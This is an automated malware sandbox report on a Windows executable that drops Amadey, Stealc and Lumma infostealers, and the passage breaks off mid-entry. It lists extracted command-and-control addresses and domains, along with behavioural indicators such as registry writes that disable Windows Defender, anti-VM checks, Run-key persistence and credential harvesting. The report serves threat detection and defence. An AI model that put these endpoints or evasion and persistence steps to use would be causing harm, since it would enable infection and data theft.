Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 20:37
Static task
static1
Behavioral task
behavioral1
Sample
4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
Resource
win10v2004-20241007-en
General
-
Target
4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
-
Size
1.9MB
-
MD5
b2f874f58722f67061a01726f43ce570
-
SHA1
87572c77ec7d2ae7385f5855b337d2ddb530cb01
-
SHA256
4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df
-
SHA512
e3c955999c2573742e346058a4b3cc4e0f6350edb2c55bcd83cef00e6a28902da787ff47eae7c556753073e9d985ca706e1e866845881d7c18bd705c6d637782
-
SSDEEP
49152:NzMZdtSFojAfiO4oC8KIjlrRT132upCb+A860u:NadtiZfiyDNpZB+b+A8z
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
default_valenciga
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
lumma
https://drive-connect.cyou
https://crib-endanger.sbs
https://faintbl0w.sbs
https://300snails.sbs
https://bored-light.sbs
https://3xc1aimbl0w.sbs
https://pull-trucker.sbs
https://fleez-inc.sbs
https://thicktoys.sbs
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://drive-connect.cyou/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a059e40180.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a059e40180.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a059e40180.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a059e40180.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a059e40180.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection a059e40180.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5736 created 2540 5736 nSoft.exe 42 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e6a62fc7c5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 46c1facbb6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b107b900a0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 531cd8388c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a059e40180.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6c3a0fbc6f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aa3d6bbb08.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b489200d48.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nSoft.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7b7ddf7558.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 239 5856 rundll32.exe 247 3376 cmd.exe 265 3376 cmd.exe 281 3376 cmd.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6024 powershell.exe 1976 powershell.exe -
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 2968 bitsadmin.exe 5404 bitsadmin.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 531cd8388c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 46c1facbb6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a059e40180.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7b7ddf7558.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6c3a0fbc6f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6c3a0fbc6f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 531cd8388c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a059e40180.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nSoft.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aa3d6bbb08.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aa3d6bbb08.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e6a62fc7c5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b489200d48.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b107b900a0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e6a62fc7c5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b107b900a0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b489200d48.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 46c1facbb6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nSoft.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7b7ddf7558.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation AllNew.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation am209.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation defnur.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation b107b900a0.exe -
Executes dropped EXE 39 IoCs
pid Process 1900 skotes.exe 4552 stories.exe 4516 stories.tmp 2964 videojet3264.exe 4740 b107b900a0.exe 2660 axplong.exe 1488 0DMNix3.exe 3572 stealc_default2.exe 2908 alex2022.exe 3492 alex2022.exe 4352 e6a62fc7c5.exe 4024 axplong.exe 684 skotes.exe 1924 531cd8388c.exe 4672 AllNew.exe 2020 b489200d48.exe 1944 Gxtuum.exe 1860 46c1facbb6.exe 2280 2d898dd098.exe 2316 Office2024.exe 1052 trru7rd2.exe 3776 am209.exe 428 defnur.exe 5208 a059e40180.exe 5736 nSoft.exe 5868 6c3a0fbc6f.exe 1012 newwork.exe 6104 newwork.tmp 6552 aa3d6bbb08.exe 6848 7b7ddf7558.exe 3892 rzyyvjydedax.exe 2344 axplong.exe 4416 skotes.exe 4236 Gxtuum.exe 5284 defnur.exe 1088 axplong.exe 4796 skotes.exe 6464 Gxtuum.exe 6528 defnur.exe -
Identifies Wine through registry keys 2 TTPs 18 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 6c3a0fbc6f.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 531cd8388c.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 46c1facbb6.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 7b7ddf7558.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine b107b900a0.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine e6a62fc7c5.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine b489200d48.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine a059e40180.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine aa3d6bbb08.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe -
Loads dropped DLL 9 IoCs
pid Process 4516 stories.tmp 2964 videojet3264.exe 1488 0DMNix3.exe 1488 0DMNix3.exe 3572 stealc_default2.exe 3572 stealc_default2.exe 6104 newwork.tmp 1488 0DMNix3.exe 5856 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features a059e40180.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a059e40180.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b489200d48.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011748001\\b489200d48.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\46c1facbb6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011749001\\46c1facbb6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d898dd098.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011750001\\2d898dd098.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a059e40180.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011751001\\a059e40180.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aa3d6bbb08.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005208001\\aa3d6bbb08.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7b7ddf7558.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005209001\\7b7ddf7558.exe" axplong.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nSoft.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 264 pastebin.com 265 pastebin.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 7020 powercfg.exe 7016 powercfg.exe 2168 powercfg.exe 6708 powercfg.exe 6736 powercfg.exe 6724 powercfg.exe 6716 powercfg.exe 7008 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000d000000023d0a-406.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Office2024.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe rzyyvjydedax.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
pid Process 1136 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe 1900 skotes.exe 4740 b107b900a0.exe 2660 axplong.exe 4024 axplong.exe 684 skotes.exe 4352 e6a62fc7c5.exe 1924 531cd8388c.exe 2020 b489200d48.exe 1860 46c1facbb6.exe 5208 a059e40180.exe 5736 nSoft.exe 5868 6c3a0fbc6f.exe 6552 aa3d6bbb08.exe 6848 7b7ddf7558.exe 2344 axplong.exe 4416 skotes.exe 1088 axplong.exe 4796 skotes.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2908 set thread context of 3492 2908 alex2022.exe 121 PID 3892 set thread context of 6200 3892 rzyyvjydedax.exe 247 PID 3892 set thread context of 3376 3892 rzyyvjydedax.exe 251 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe File created C:\Windows\Tasks\axplong.job b107b900a0.exe File created C:\Windows\Tasks\Gxtuum.job AllNew.exe File created C:\Windows\Tasks\defnur.job am209.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5884 sc.exe 6324 sc.exe 1804 sc.exe 5644 sc.exe 5656 sc.exe 6284 sc.exe 6816 sc.exe 6764 sc.exe 5676 sc.exe 5760 sc.exe 6660 sc.exe 7100 sc.exe 2564 sc.exe 6928 sc.exe -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral2/files/0x0007000000023d05-441.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 1700 2184 WerFault.exe 98 876 1924 WerFault.exe 127 364 1924 WerFault.exe 127 3024 3492 WerFault.exe 121 996 2020 WerFault.exe 130 5716 6848 WerFault.exe 181 5772 6848 WerFault.exe 181 5728 6848 WerFault.exe 181 3004 5868 WerFault.exe 174 -
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 46c1facbb6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stories.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nSoft.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newwork.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newwork.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ping.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b107b900a0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 531cd8388c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language trru7rd2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7b7ddf7558.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AllNew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language am209.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stories.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex2022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language defnur.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6c3a0fbc6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language videojet3264.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0DMNix3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2d898dd098.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 2d898dd098.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e6a62fc7c5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 2d898dd098.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a059e40180.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aa3d6bbb08.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b489200d48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5072 ping.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default2.exe -
Kills process with taskkill 5 IoCs
pid Process 4508 taskkill.exe 3552 taskkill.exe 2296 taskkill.exe 364 taskkill.exe 3752 taskkill.exe -
Modifies data under HKEY_USERS 50 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet 